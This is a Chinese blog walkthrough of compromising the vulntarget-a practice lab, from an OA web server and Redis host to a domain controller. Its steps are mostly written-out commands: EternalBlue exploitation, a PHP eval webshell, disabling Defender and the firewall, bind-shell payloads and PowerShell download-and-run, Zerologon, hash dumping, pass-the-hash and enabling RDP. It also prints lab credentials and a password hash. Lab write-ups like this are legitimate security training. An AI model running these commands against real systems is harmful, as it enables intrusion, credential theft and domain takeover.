打穿内网之Vulntarget-a靶场实战记录

已于 2022-11-13 00:15:46 修改
阅读量2.3k 收藏 8
点赞数 4
分类专栏: 从入门到入狱 文章标签: 安全 网络 web安全 服务器 运维
于 2022-11-11 21:13:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/127795827
版权

攻击手段

通达OA未授权上传+文件包含RCE

Redis未授权写马

ms17-010永恒之蓝

代理转发内网跳板

CVE-2020-1472 域控杀器Zerologon

wmiexec/smbexec横向移动

cobalt strike与msf的shell传递

网络环境

靶场地址:https://github.com/crow821/vulntarget

攻击机

kali ip:192.168.1.11

web服务器(WIN7)

内网ip:10.0.20.98

外网ip:192.168.1.7

win7/admin

域主机(WIN2016)

内网1:10.0.20.99

内网2:10.0.10.111

Administrator/Admin@123、vulntarget.com\win2016/Admin#123

域控(WIN2019)

内网2:10.0.10.110

administrator/Admin@666

信息收集

端口扫描

nmap -A -sV 192.168.1.7

 访问80端口,发现是通达OA

 同时经nmap探测看见了熟悉的445端口,并存在永恒之蓝漏洞。如果只扫了端口也可以msf常规探测一波

msfconsole

 查询利用模块

search ms17_010

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.7
run

扫描出ms17-010永恒之蓝漏洞

漏洞利用

OA通达通用漏洞

永恒之蓝

利用这两个洞打一波

通达OA

去我搭建的Wiki文库看一下

存在的版本漏洞还是很多的

首先判断下通达OA的版本信息,有多个路径可以判断

http://192.168.1.7/inc/expired.php

 http://192.168.1.7/inc/reg_trial.php

 http://192.168.1.7/inc/reg_trial_submit.php

确定版本为11.3,可以利用未授权上传+文件包含RCE。

不想找了直接上脚本打。脚本在github上找的

获取cookie

 一键利用

 哥斯拉利用获得shell进行远控,得到的是system权限

永恒之蓝

因为之前探测到445端口确实存在永恒之蓝,msf利用 exploit/windows/smb/ms17_010_eternalblue直接打一下

use  exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.7
run

成功拿到meterpreter

 顺便抓一波密码 Win7-PC 密码为admin

load kiwi
creds_all

上线CS

准备上线cs,启动cs server

./teamserver 192.168.1.11 123456

连一下

 启动监听器

 可以使用cs创建木马exe,放到目标机器执行。但鉴于已经拿到meterpreter,直接利用msf会话注入cs

后台当前session

background

加载msf的payload注入功能

use exploit/windows/local/payload_inject

设置payload

set payload windows/meterpreter/reverse_http

设置cs服务器地址端口

set LHOST 192.168.1.11
set LPORT 7777

设置监控会话

set session 1

设置当前msf不接受监听数据

set disablepayloadhander true

run

 成功上线cs

接下来进入内网渗透环节

内网渗透

利用打下来的机子继续渗透

当前被控制下来的机子内网ip为10.0.20.98

扫描c段ip及重要端口

portscan 10.0.20.0-10.0.20.255 1-1024,3389,5000-6400 arp 1024

发现另一台内网主机ip,10.0.20.99并且开放端口6379、5985、80

构建通道

meterpreter掉线了,重新利用cs拿一下

启动Foreign HTTP监听器

 msf监听

use exploit/multi/handler
set lhost 0.0.0.0
set lport 5555
set payload windows/meterpreter/reverse_http

控制机右键spawn

 选择msf

msf重新获得meterpreter

之后添加路由

run autoroute -s 10.0.20.0/24

我们现在无法直接访问内网,但win7的内网主机已经上线,可以进行代理转发将win7作为跳板机直接访问内网。

配置socks代理

 端口8888

 

 攻击机kali利用proxychains 配合Socks代理通信

vim /etc/proxychains4.conf

底部添加

socks4 127.0.0.1 8888

测试下代理转发是否生效,nmap 走 Socks 代理

proxychains nmap -Pn -sT -p6379 10.0.20.99

 

记得除了6379还有80端口

浏览器开代理进行访问,Type类型修改为SOCKS4

 开启代理后直接访问10.0.20.99的80端口,看看有什么东西,然而啥都没有

 fuzz下目录看看有什么东西,是真的乱

proxychains python dirsearch.py -u http://10.0.20.99 -i 200

不用proxychains了直接代理

python dirsearch.py -u "http://10.0.20.99/" --proxy=socks4://127.0.0.1:8888

扫到php文件

l.php

 phpinfo.php

都是一些配置信息,可能后面会有用

先看6379的Redis端口是不是未授权

proxychains redis-cli -h 10.0.20.99

还真的是,直接写入webshell,因为这个服务器同时开启了http就不用写反弹shell了

主要就是找到路径,而路径在l.php已经给了...

config set dir "C:/phpStudy/PHPTutorial/www/"
config set dbfilename shell.php
set x "<?php @eval($_POST['tpa']);?>"
save

 直接远控试一下,哥斯拉没连成直接上蚁剑,需要先开启代理

连接成功

查看权限

 信息收集一波

quser

 发现win2016用户在线

ipconifg /all

发现域名vulntarget.com以及另一个内网ip:10.0.10.111

 查看进程

tasklist

获得结果

System Idle Process              0 Services                   0          4 K
System                           4 Services                   0        140 K
smss.exe                       260 Services                   0      1,192 K
csrss.exe                      372 Services                   0      4,452 K
csrss.exe                      468 Console                    1      4,080 K
wininit.exe                    488 Services                   0      5,044 K
winlogon.exe                   524 Console                    1     14,912 K
services.exe                   596 Services                   0      7,088 K
lsass.exe                      612 Services                   0     15,796 K
svchost.exe                    688 Services                   0     19,204 K
svchost.exe                    744 Services                   0     10,076 K
svchost.exe                    848 Services                   0     47,292 K
dwm.exe                        908 Console                    1     59,552 K
svchost.exe                    932 Services                   0     21,068 K
svchost.exe                   1008 Services                   0     22,648 K
svchost.exe                   1016 Services                   0     22,028 K
svchost.exe                    464 Services                   0     18,336 K
svchost.exe                   1036 Services                   0     21,180 K
svchost.exe                   1128 Services                   0      7,080 K
spoolsv.exe                   1644 Services                   0     15,292 K
svchost.exe                   1776 Services                   0     16,148 K
svchost.exe                   1840 Services                   0      8,000 K
svchost.exe                   1864 Services                   0     20,456 K
vm3dservice.exe               1928 Services                   0      6,028 K
vmtoolsd.exe                  1948 Services                   0     20,920 K
httpd.exe                     1964 Services                   0     15,376 K
MsMpEng.exe                   2000 Services                   0     86,692 K
vm3dservice.exe               1772 Console                    1      6,936 K
redis-server.exe              1564 Services                   0     26,208 K
VGAuthService.exe             1556 Services                   0     10,364 K
svchost.exe                   2164 Services                   0      6,820 K
dllhost.exe                   2592 Services                   0     12,376 K
msdtc.exe                     2700 Services                   0      9,820 K
httpd.exe                     3024 Services                   0     54,104 K
WmiPrvSE.exe                  3736 Services                   0     31,684 K
WmiPrvSE.exe                  3744 Services                   0     19,460 K
RuntimeBroker.exe             3908 Console                    1     26,352 K
sihost.exe                    3972 Console                    1     18,644 K
svchost.exe                   4008 Console                    1     19,796 K
taskhostw.exe                 4028 Console                    1     14,432 K
ChsIME.exe                     660 Console                    1     15,148 K
explorer.exe                  1140 Console                    1     61,068 K
ShellExperienceHost.exe       4540 Console                    1     57,132 K
SearchUI.exe                  4688 Console                    1     43,848 K
ServerManager.exe             5096 Console                    1    172,844 K
vmtoolsd.exe                  4672 Console                    1     33,176 K
LogonUI.exe                   5164 Console                    1     36,616 K
ChsIME.exe                    5076 Console                    1      7,844 K
LockAppHost.exe               4504 Console                    1     42,808 K
LockApp.exe                   5540 Console                    1     40,016 K
MpCmdRun.exe                  3792 Services                   0      8,184 K
WmiPrvSE.exe                  4736 Services                   0      9,040 K
WmiPrvSE.exe                  4172 Services                   0     13,288 K
cmd.exe                       4476 Services                   0      3,584 K
conhost.exe                   5512 Services                   0      5,484 K
cmd.exe                       5452 Services                   0      3,564 K
tasklist.exe                  5868 Services                   0      7,904 K

将结果复制到蚁剑插件看看有没有杀软,识别出开启了Windows Defender

尝试上传木马一直被杀

除了Windows Defender还开了防火墙,把这俩玩意关了

关Windows Defender

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

gpupdate /force

关防火墙

netsh advfirewall show allprofiles # 查看防火墙配置
netSh advfirewall set allprofiles state off # 关闭防火墙

生成木马,上传

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8881 -f exe -o fxx.exe

 由于这个是正向的webshell,msf需要监听的ip是内网的ip

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
set lport 8881

但不知道为何msf死活不上线,后面用了proxychains启动msf执行这流程成功获得了meterpreter

proxychains msfconsole

 之后直接上线cs吧,启动tcp监听器

 生成后门

Win2016 10.0.20.99上传后门并运行

通过Win7 10.0.20.98监听 成功上线

connect 10.0.20.99 5557

域渗透

目前就差个DC域控就打穿了

还是信息收集先找到域控

查看当前时间,通常情况时间服务器都是主域控。

net time /domain

 拿到域名,直接ping得到ip 10.0.10.110

 查找域控计算机名 WIN2019

net group "domain controllers" /domain

接着拿域控大杀器Zerologon漏洞打一下(CVE-2020-1472)

攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。

影响版本如下

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

因为这里用Win7的机器直接ping不通DC,Win2016有10.0.10.111和域控在同一C段可以ping通域控,还需要添加新的10.0.10.0/24的路由,因为已经上线了msf,直接添加

run autoroute -s 10.0.10.0/24

 cs设置代理转发端口

vim /etc/proxychains4.conf

添加,同时需要将之前的8888代理转发先注释掉

socks4  127.0.0.1 8887

 之后我们的CVE-2020-1472验证脚本才能成功运行,验证出确实存在Zerologon的漏洞

proxychains python3 zerologon_tester.py WIN2019 10.0.10.110

GitHub - SecuraBV/CVE-2020-1472: Test tool for CVE-2020-1472

 利用exp打一波

https://github.com/dirkjanm/CVE-2020-1472

先将密码置空

proxychains python cve-2020-1472-exploit.py WIN2019 10.0.10.110

python安装impacket包,并利用examples目录下的exp获取hash

python3 secretsdump.py 域名称/域控主机名$@域控IP -no-pass

proxychains python3 secretsdump.py vulntarget/win2019\$@10.0.10.110 -no-pass

 成功得到域管administrator的hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

利用smbexex.py 或 wmiexec.py横向移动,拿下域控

proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15
administrator@10.0.10.110

proxychains python3 wmiexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15
vulntarget/administrator@10.0.10.110

拿下域控接下来上线msf

先把域控防火墙关了

netsh advfirewall show allprofiles # 查看防火墙配置
netSh advfirewall set allprofiles state off # 关闭防火墙

或者添加防火墙规则

netsh advfirewall firewall add rule name="bind_fuxx" protocol=TCP dir=in localport=8886 action=allow

生成正向后门

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8886 -f exe -o 8886bind.exe

因为10.0.20.99开启了80端口有Web服务,可以先传到这台机子上方便域控下载后门

传完进行下载

powershell (new-object
System.Net.WebClient).DownloadFile('http://10.0.10.111/8886bind.exe','c:\tp.exe')

msf启动还是得利用win2016作为跳板机代理转发

proxychains msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8886
set rhost 10.0.10.110

 上线cs

 生成后门

上传10.0.20.99

执行

powershell (new-object
System.Net.WebClient).DownloadFile('http://10.0.10.111/tcp_5998.exe','c:\ketty.exe')
ketty.exe

cs正向连接

connect 10.0.10.110 5998

 成功打穿

 远控

域控如果是弱口令的话可以进行爆破

john --wordlist=password.txt dchash.txt --format=NT

得到域控密码为Admin@666

开启3389端口

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

防火墙放行3389(或关闭防火墙)连接

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

成功远控DC

tpaer
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6022
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
渗透靶场——vulntarget-a综合靶场
tlovejr的博客
03-24 4874
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
vulntarget】系列:vulntarget-a 练习WP
一只爱吃橙子的羊
07-09 663
vulntarget靶场系列,vulntarget-a 练习WP,会持续更新……
巨细巨细的白痴级vulntarget-a靶场wp再不会你打死我
XYpangSJ的博客
06-01 952
ps:此处 攻击机ip192.168.87.134,win7ip1为192.168.87.144。配完去攻击机上访问win7ip看看能否访问,可以就表示配置完成。使用proxychains4对10.0.20.99进行端口扫描。修改etc/proxychains4.conf。用procychains4代理使用哥斯拉连接。开放了80端口访问一下phpinfo.php。使用redis未授权访问xieshell。点击target,选择add,如下填写。使用socks_proxy做代理。
靶场实战vulntarget-a漏洞靶场实战
最新发布
TT小子的博客
06-20 654
vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
vultarget-a红日靶场全面解析(完整版)
热门推荐
问彡心的博客
11-02 1万+
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1004
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
内网渗透vulntarget-a 多层域控靶场
weixin_68408599的博客
12-22 2367
网络拓扑图如下这里我们本次渗透测试,外网Win7IP地址为192.168.127.91靶机信息:靶机用户名密码Windows 7win7adminAdmin@123Admin#123Admin@666靶机下载地址:https://github.com/crow821/vulntarget这个靶场是我第一个搭建在本地上的靶场,虽然中路有很多挫折,比如在前期配置外网网卡时候,发现DHCP一直分配不上ip地址,一直是168.254.X.X,好在后面及时发现问题,发现网卡设置错了。
Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 A)
网络安全领域___专研者.
06-02 1838
Web服务器一般指网站服务器,是指驻留于因特网上某种类型计算机的程序,可以处理浏览器等Web客户端的请求并返回相应响应,也可以放置网站文件,让全世界浏览;可以放置数据文件,让全世界下载.
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
内网安全攻防-渗透测试指南 读书笔记.pdf
09-09
内网安全攻防-渗透测试指南 读书笔记
内网-内网安全攻防-笔记.pdf
09-18
内网-内网安全攻防-笔记.pdf
记录一次国外某内网实战过程.pdf
11-25
WEB安全内网渗透
Vulntarget-a打靶记录
qu_xiao_lei的博客
01-26 513
由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。这里的原理是:在win2016中上传木马,该木马是将2016的shell反弹至win7中的1111端口,win7中需要用端口转发工具lcx将1111端口中的shell转发至kali的2222端口,这样在kali中监听2222端口就拿到了win2016的shell。
VulnTarget-a
大熊
06-16 547
实验目标:拿下域控桌面学习目标:信息收集/蚁剑webshell管理/CS上线/msf上线/流量代理转发/提权/漏洞利用等。靶机下载:其中vulntarget-a为本次实验机器》》》靶机信息《《《:::info跨网段需要路由转发。
vulntarget-a靶场的学习思考
weixin_48421613的博客
03-21 6491
前言: 最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境 靶场由星期五实验室与乌鸦安全共同维护,GIthub可自行下载,Github原文链接以及原过程链接如下 https://github.com/crow821/vulntarget. https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ. 靶场下载地址如下 链接: ht
vulntarget-a靶场复现
weixin_52158313的博客
12-29 642
vulntarget-a靶场复现
Vulntarget-a 打靶练习
weixin_44770698的博客
05-02 749
vulntarget-a
内网渗透--DNS隧道
05-16
DNS隧道是一种基于DNS协议的网络隧道,可以用于在内网环境中进行数据传输。DNS协议本身是一种无状态的协议,可以通过DNS请求和响应消息中的域名字段来传输数据。 在DNS隧道中,攻击者利用内网中一台主机上的DNS客户端程序向外部DNS服务器发送DNS请求。DNS请求消息中包含着攻击者需要传输的数据,这些数据经过编码后放入DNS请求中的域名字段中。外部DNS服务器接收到DNS请求消息后,解析出其中的数据,再将数据封装成DNS响应消息返回给内网主机。内网主机收到DNS响应消息后,解析出其中的数据,实现数据传输。 DNS隧道的优点是可以绕过内网防火墙和其他安全设备的检测,可以在内网环境中进行数据传输,而不被发现。但是,DNS隧道也存在一些缺点,例如传输速度较慢,数据传输量受限等。 为了防范DNS隧道攻击,内网环境中可以采取以下措施: 1. 禁止内网主机直接访问外部DNS服务器,只允许内网主机访问内部DNS服务器。 2. 配置内部DNS服务器,限制DNS请求和响应中的域名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止DNS隧道攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值